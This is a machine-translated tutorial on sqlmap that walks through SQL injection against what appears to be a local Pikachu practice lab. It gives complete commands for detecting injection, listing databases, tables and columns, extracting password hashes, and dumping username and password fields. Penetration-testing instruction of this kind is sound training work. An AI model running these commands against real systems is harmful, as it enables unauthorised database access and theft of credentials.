当前位置:网站首页>Sqlmap tutorial (II) practical skills I
Sqlmap tutorial (II) practical skills I
2022-07-05 06:06:00 【A τθ】
One 、 Detection Injection
testing URL GET Whether there is injection of parameters :
-u Tested url
"" Double quotes , Indicates that this is a string .
--dbms Specify the data engine of the attack
-v Output information is registered as 1
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1
After typing sqlmap Will automatically inject , But there will be some prompts , You need to confirm at the terminal , If you use --batch The default operation will be performed automatically , There is no need to determine the interactive information .
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 --batch
Two 、 Get sensitive information
After confirming the existence of Injection , Then, get the information through the command of getting sensitive information
--current-user Users connected by users ;
--currnet-db Current library ;
--dbs Get all libraries ;
--is-dba whether root jurisdiction ;
--passwords Get the password of the database .
Use this command sqlmap When you find the ciphertext , Will prompt you whether to hash Crack , If you need to choose the right dictionary .
eg:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 --batch
3、 ... and 、 Get the table
Get the current library , You can list tables according to the Library .
-D Specify the library ;
--tables List all the tables .
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu --tables
Four 、 Get the fields of the table
Get all the fields of a table .
-T Specify a table ;
--columns Get field .
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns
5、 ... and 、 get data
--dump Export all contents of data ;
--dump -C "username,password" Get the contents of the field ;
Get all field contents of the specified table :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns --dump
Get the specified table 、 Specify field content .
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users -C "id,username,password" --dump
6、 ... and 、 Get the specified number
Get the total number :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --count
Get specified id Number of pieces :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --dump --start 2 --stop 3
7、 ... and 、 Delete cache file
Parameters :--flush-session
If you don't want to use the previous cache of this target session file , You can use this parameter . Will empty the previous session, Retest the goal .
边栏推荐
- Introduction et expérience de wazuh open source host Security Solution
- leetcode-6110:网格图中递增路径的数目
- [article de jailhouse] jailhouse hypervisor
- 1039 Course List for Student
- Flutter Web 硬件键盘监听
- In this indifferent world, light crying
- 1.14 - 流水线
- RGB LED infinite mirror controlled by Arduino
- 【Rust 笔记】17-并发(下)
- 884. Uncommon words in two sentences
猜你喜欢
Fried chicken nuggets and fifa22
Personal developed penetration testing tool Satania v1.2 update
Smart construction site "hydropower energy consumption online monitoring system"
AtCoder Grand Contest 013 E - Placing Squares
[jailhouse article] performance measurements for hypervisors on embedded ARM processors
7. Processing the input of multidimensional features
Wazuh开源主机安全解决方案的简介与使用体验
网络工程师考核的一些常见的问题:WLAN、BGP、交换机
Introduction et expérience de wazuh open source host Security Solution
[practical skills] technical management of managers with non-technical background
随机推荐
Collection: programming related websites and books
Overview of variable resistors - structure, operation and different applications
One question per day 2047 Number of valid words in the sentence
SPI 详解
1041 Be Unique
Implement an iterative stack
One question per day 1447 Simplest fraction
开源存储这么香,为何我们还要坚持自研?
从Dijkstra的图灵奖演讲论科技创业者特点
QT判断界面当前点击的按钮和当前鼠标坐标
Annotation and reflection
shared_ Repeated release heap object of PTR hidden danger
1.13 - RISC/CISC
Dynamic planning solution ideas and summary (30000 words)
[rust notes] 14 set (Part 1)
2022年贵州省职业院校技能大赛中职组网络安全赛项规程
Introduction et expérience de wazuh open source host Security Solution
Bit mask of bit operation
[practical skills] technical management of managers with non-technical background
做 SQL 性能优化真是让人干瞪眼